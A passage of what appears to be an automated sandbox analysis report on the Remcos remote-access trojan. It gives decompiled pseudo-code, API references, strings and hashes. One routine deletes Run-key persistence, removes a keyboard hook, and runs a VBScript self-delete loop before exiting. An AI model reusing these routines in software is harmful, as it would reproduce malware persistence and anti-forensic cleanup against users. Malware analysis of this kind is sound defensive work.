				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0043F348(0, 1, 0x50);
					_v8 = _t234;
					E004401F5(0);
					if(_t234 != 0) {
						_t227 = E0043F348(0, 1, 4);
						_v12 = _t227;
						E004401F5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0043F348(0, 1, 4);
							_v16 = _t232;
							E004401F5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00448782(_v8);
								E004401F5(_v8);
								E004401F5(_v12);
								E004401F5(_v16);
								goto L4;
							}
							E004401F5(_t234);
							E004401F5(_v12);
							L7:
							goto L4;
						}
						E004401F5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004401F5( *(_t210 + 0x88));
							E004401F5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x00448880
0x00448889
0x00448890
0x00448893
0x00448896
0x0044889f
0x004488c1
0x004488c5
0x004488c8
0x004488d2
0x004488e5
0x004488e9
0x004488ec
0x004488f6
0x00448908
0x00448b9e
0x00448b9f
0x00448ba1
0x00448ba9
0x00448bad
0x00448bb2
0x00448bbd
0x00448bc9
0x00448bd5
0x00448be1
0x00448be7
0x00448beb
0x00448bed
0x00448bed
0x00000000
0x00448beb
0x00448917
0x0044891b
0x0044891e
0x00448928
0x0044893c
0x00448942
0x00448957
0x0044896b
0x00448982
0x0044899c
0x004489a4
0x004489b6
0x004489cd
0x004489e4
0x004489fe
0x00448a15
0x00448a2c
0x00448a43
0x00448a5d
0x00448a74
0x00448a8b
0x00448aa2
0x00448abc
0x00448ad3
0x00448aea
0x00448b01
0x00448b1b
0x00448b37
0x00448b65
0x00448b78
0x00448b69
0x00448b6d
0x00448b81
0x00000000
0x00000000
0x00448b83
0x00448b85
0x00448b88
0x00448b8a
0x00448b8d
0x00448b73
0x00448b75
0x00448b77
0x00448b77
0x00448b77
0x00448b6d
0x00000000
0x00448b7d
0x00448b3d
0x00448b43
0x00448b4c
0x00448b55
0x00000000
0x00448b5a
0x0044892b
0x00448934
0x004488fe
0x00000000
0x004488fe
0x004488f9
0x00000000
0x004488f9
0x004488d4
0x00000000
0x004488a9
0x004488a9
0x004488ab
0x004488ae
0x00448bef
0x00448bef
0x00448bf7
0x00448bf9
0x00448bf9
0x00448c01
0x00448c06
0x00448c0a
0x00448c12
0x00448c1a
0x00448c20
0x00448c0a
0x00448c24
0x00448c29
0x00448c2f
0x00000000
0x00448c2f

APIs

_free.LIBCMT ref: 004488C8
_free.LIBCMT ref: 004488EC
_free.LIBCMT ref: 004488F9
_free.LIBCMT ref: 0044891E
_free.LIBCMT ref: 0044892B
_free.LIBCMT ref: 00448934
_free.LIBCMT ref: 00448C12
_free.LIBCMT ref: 00448C1A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a9f8539c7d8899899db9d987fa52c4c806cbca7fbe9b42a804e217705a4c1dd9
Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
Opcode Fuzzy Hash: a9f8539c7d8899899db9d987fa52c4c806cbca7fbe9b42a804e217705a4c1dd9
Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798

Uniqueness

Uniqueness Score: -1.00%

Function 1059BF50, Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1059BF50(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				intOrPtr* _t236;

				E105A0FC9();
				if( *0x46a9d4 != 0x30) {
					E1059ABE1();
				}
				_t243 =  *0x46bd6b - 1;
				if( *0x46bd6b == 1) {
					E105A61EC(_t243);
				}
				if( *0x46ba75 != 0) {
					E105A85C2(E10592D59(0x46c0e0));
				}
				if( *0x46bb02 == 1) {
					E105A1BCA(0x80000001, 0x45ff08, E10592D59(0x46c4e8));
				}
				if( *0x46bafb == 1) {
					E105A1BCA(0x80000002, 0x45ff08, E10592D59(0x46c4e8));
				}
				if( *0x46bb00 == 1) {
					E105A1BCA(0x80000002, 0x45ff68, E10592D59(0x46c4e8));
				}
				_t53 = E105932F7();
				_t54 = E10592E03(0x46c560);
				_t57 = E105A189E(E10592E03(0x46c518), 0x460190,  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, E10592E03(0x46c518));
				_t236 =  *0x453238;
				_t61 =  *_t236( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E10598352(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					 *_t236(E10592D59(0x46c530), 0x80);
				}
				E10593F14(_t134,  &_v124, E105950ED(_t134,  &_v52, E105CA6ED(_t134, _t140, _t249, 0x460008)), 0, _t249, 0x460268);
				E10592D5E();
				E10595273(_t134,  &_v28, 0x4601a4, _t249, E105950ED(_t134,  &_v52, 0x460040));
				E10592D5E();
				_t250 = _t134;
				if(_t134 != 0) {
					E1059417F(E10593F14(_t134,  &_v52, E10595273(_t134,  &_v76, 0x4601d8, _t250, E105950ED(_t134,  &_v100,  &_v692)), 0, _t250, 0x4601d0));
					E10592D5E();
					E10592D5E();
					E10592D5E();
				}
				E1059417F(E10593F14(_t134,  &_v100, E10593F14(_t134,  &_v76, E105950ED(_t134,  &_v52, 0x460210), 0, _t250,  &_v692), 0, _t250, 0x460208));
				E10592D5E();
				E10592D5E();
				E10592D5E();
				_t251 = _t134;
				if(_t134 != 0) {
					E105984DA(_t134,  &_v28, 0, 0x460234);
				}
				_t78 = E10598352(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E1059417F(E10593F14(0x45f724,  &_v100, E1059ACD7( &_v76, 0x460240, _t252, 0x46c530), 0, _t252, 0x460208));
					E10592D5E();
					E10592D5E();
				}
				_t79 = E105950ED(0x45f724,  &_v172, 0x4600d0);
				E1059417F(E10593F14(0x45f724,  &_v100, E10593E9E( &_v76, E10595297(0x45f724,  &_v52, E105950ED(0x45f724,  &_v148, 0x4600e0), _t252,  &_a4), _t79), 0, _t252, 0x4600ac));
				E10592D5E();
				E10592D5E();
				E10592D5E();
				E10592D5E();
				E10592D5E();
				E105984DA(0x45f724,  &_v28, 0, 0x460140);
				_t92 = E10592D59( &_v124);
				_t93 = E105932F7();
				if(E105A87B5(E10592D59( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, 0x45f6e4, E10592D59( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E10592D5E();
				E10592D5E();
				return E10592D5E();
			}

0x1059bf5c
0x1059bf68
0x1059bf6a
0x1059bf6a
0x1059bf72
0x1059bf78
0x1059bf7a
0x1059bf7a
0x1059bf86
0x1059bf94
0x1059bf94
0x1059bfa9
0x1059bfba
0x1059bfbf
0x1059bfc6
0x1059bfd7
0x1059bfdc
0x1059bfe3
0x1059bff7
0x1059bffc
0x1059c004
0x1059c00c
0x1059c032
0x1059c03c
0x1059c03e
0x1059c049
0x1059c049
0x1059c05c
0x1059c062
0x1059c074
0x1059c07f
0x1059c084
0x1059c086
0x1059c089
0x1059c08e
0x1059c090
0x1059c097
0x1059c0a2
0x1059c0a2
0x1059c0c2
0x1059c0cb
0x1059c0e6
0x1059c0ef
0x1059c0f4
0x1059c0f6
0x1059c12a
0x1059c132
0x1059c13a
0x1059c142
0x1059c142
0x1059c17a
0x1059c182
0x1059c18a
0x1059c192
0x1059c197
0x1059c199
0x1059c1a3
0x1059c1a3
0x1059c1b6
0x1059c1bb
0x1059c1bd
0x1059c1e2
0x1059c1ea
0x1059c1f2
0x1059c1f2
0x1059c207
0x1059c246
0x1059c24e
0x1059c256
0x1059c25e
0x1059c269
0x1059c274
0x1059c281
0x1059c28a
0x1059c293
0x1059c2b1
0x1059c2d1
0x1059c2d1
0x1059c2da
0x1059c2e2
0x1059c2f5

APIs

Part of subcall function 105A0FC9: TerminateProcess.KERNEL32(00000000,?,1059BC03), ref: 105A0FD9
Part of subcall function 105A0FC9: WaitForSingleObject.KERNEL32(000000FF,?,1059BC03), ref: 105A0FEC

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1059C049
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1059C05C

Part of subcall function 1059ABE1: DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
Part of subcall function 1059ABE1: RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
Part of subcall function 1059ABE1: TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
Part of subcall function 1059ABE1: UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
Part of subcall function 1059ABE1: TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12

Part of subcall function 105A87B5: CreateFileW.KERNEL32(10596BD7,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,105A88DF,00000000,00000000), ref: 105A87F4

ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059C2C5
ExitProcess.KERNEL32 ref: 1059C2D1

Strings

Remcos, xrefs: 1059BF99
fso.DeleteFolder ", xrefs: 1059C1C5
while fso.FileExists(", xrefs: 1059C10D
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 1059BF9E
On Error Resume Next, xrefs: 1059C0DE
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1059BFED

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: FileTerminate$DeleteProcessThread$CreateDirectoryExecuteExitHookModuleNameObjectRemoveShellSingleUnhookWaitWindows
String ID: On Error Resume Next$Remcos$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$fso.DeleteFolder "$while fso.FileExists("
API String ID: 774052570-1409672675
Opcode ID: 32129de1932d1c29b9960b25ed1ce55d8a6a858bca0eed3546b7f515e473f87f
Instruction ID: ba018c7ee5c78d3d04bed26c10c968710a72639207a9201238017a73f617da97
Opcode Fuzzy Hash: 32129de1932d1c29b9960b25ed1ce55d8a6a858bca0eed3546b7f515e473f87f
Instruction Fuzzy Hash: 60916139A002189ADB04EB60EC5AEFF7F69EF90640F10406EB406670A5FF647D4BCB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0044F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0044EFB8(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00448575(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0044EF23();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E004484BE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0044ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0044EF23();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043A4CE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00448687( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044F134(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044551E(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043A4CE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0043A504())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043A4CE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0044EF23();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043A4F1()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0043A504())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043A4F1()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0043A504()));
				}
			}

0x0044f278
0x0044f27c
0x0044f27d
0x0044f27d
0x0044f27d
0x0044f27f
0x0044f285
0x0044f2a0
0x0044f2a5
0x0044f2a8
0x0044f2aa
0x0044f2ac
0x0044f2cb
0x0044f2d2
0x0044f2d9
0x0044f2dc
0x0044f2e8
0x0044f2eb
0x0044f2f3
0x0044f2f4
0x0044f2f7
0x0044f2f7
0x0044f2fe
0x0044f300
0x0044f303
0x0044f30b
0x0044f30e
0x0044f37b
0x0044f37c
0x0044f382
0x0044f384
0x0044f3cd
0x0044f3d0
0x0044f3d9
0x0044f3dc
0x0044f3df
0x0044f3e1
0x0044f3e1
0x0044f3e1
0x0044f3d2
0x0044f3d5
0x0044f3d5
0x0044f3e6
0x0044f3e9
0x0044f3f5
0x0044f3fa
0x0044f406
0x0044f410
0x0044f414
0x0044f41e
0x0044f421
0x0044f42c
0x0044f431
0x0044f441
0x0044f444
0x0044f448
0x0044f449
0x0044f44f
0x0044f454
0x0044f457
0x0044f459
0x0044f45b
0x0044f460
0x0044f463
0x0044f465
0x0044f48f
0x0044f4b3
0x0044f4b7
0x0044f4bb
0x0044f4bd
0x0044f4c1
0x0044f4c3
0x0044f4cd
0x0044f4d0
0x0044f4d7
0x0044f4d7
0x0044f4d7
0x0044f4d7
0x0044f4c1
0x0044f4dc
0x0044f4e8
0x0044f4ea
0x0044f575
0x0044f575
0x00000000
0x0044f4f0
0x0044f4f0
0x0044f4f4
0x00000000
0x00000000
0x0044f4f9
0x0044f50b
0x0044f513
0x0044f516
0x0044f517
0x0044f51a
0x0044f521
0x0044f526
0x0044f529
0x0044f55d
0x0044f567
0x0044f567
0x0044f571
0x00000000
0x0044f571
0x0044f532
0x0044f54b
0x0044f552
0x0044f375
0x00000000
0x0044f375
0x0044f4ea
0x0044f467
0x00000000
0x0044f433
0x0044f43a
0x0044f43d
0x0044f43f
0x0044f469
0x0044f46b
0x00000000
0x0044f471
0x00000000
0x0044f43f
0x0044f431
0x0044f38c
0x0044f38f
0x0044f3aa
0x0044f3af
0x0044f3b5
0x0044f3b7
0x0044f3c2
0x0044f3c2
0x00000000
0x0044f3b7
0x0044f310
0x0044f317
0x0044f319
0x0044f350
0x0044f350
0x0044f35a
0x0044f35d
0x0044f364
0x0044f364
0x0044f364
0x0044f370
0x00000000
0x0044f370
0x0044f31b
0x0044f31f
0x00000000
0x00000000
0x0044f321
0x0044f330
0x0044f335
0x0044f338
0x0044f339
0x0044f33c
0x0044f33c
0x0044f343
0x0044f345
0x0044f348
0x0044f34b
0x0044f34e
0x00000000
0x00000000
0x00000000
0x0044f2ae
0x0044f2b3
0x0044f2b6
0x0044f2bd
0x00000000
0x0044f2bd
0x0044f287
0x0044f28c
0x0044f292
0x0044f294
0x00000000
0x0044f299

APIs

Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40

GetLastError.KERNEL32 ref: 0044F369
__dosmaperr.LIBCMT ref: 0044F370
GetFileType.KERNEL32(00000000), ref: 0044F37C
GetLastError.KERNEL32 ref: 0044F386
__dosmaperr.LIBCMT ref: 0044F38F
CloseHandle.KERNEL32(00000000), ref: 0044F3AF
CloseHandle.KERNEL32(?), ref: 0044F4F9
GetLastError.KERNEL32 ref: 0044F52B
__dosmaperr.LIBCMT ref: 0044F532

Strings

H, xrefs: 0044F4B7

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 1059BBF2, Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1059BBF2() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				intOrPtr* _t219;

				E105A0FC9();
				if( *0x46a9d4 != 0x30) {
					E1059ABE1();
				}
				_t227 =  *0x46bd6b - 1;
				if( *0x46bd6b == 1) {
					E105A61EC(_t227);
				}
				if( *0x46ba75 != 0) {
					E105A85C2(E10592D59(0x46c0e0));
				}
				if( *0x46bb02 == 1) {
					E105A1BCA(0x80000001, 0x45ff08, E10592D59(0x46c4e8));
				}
				if( *0x46bafb == 1) {
					E105A1BCA(0x80000002, 0x45ff08, E10592D59(0x46c4e8));
				}
				if( *0x46bb00 == 1) {
					E105A1BCA(0x80000002, 0x45ff68, E10592D59(0x46c4e8));
				}
				E105C2D6E(0,  &_v668, 0, 0x208);
				_t49 = E105932F7();
				_t50 = E10592E03(0x46c560);
				_t53 = E105A189E(E10592E03(0x46c518), 0x460190,  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, E10592E03(0x46c518));
				_t56 = E10598352(_t232);
				_t219 =  *0x453238;
				_t233 = _t56;
				if(_t56 != 0) {
					 *_t219(E10592D59(0x46c530), 0x80);
				}
				_t123 =  ~( *_t219( &_v668, 0x80));
				asm("sbb bl, bl");
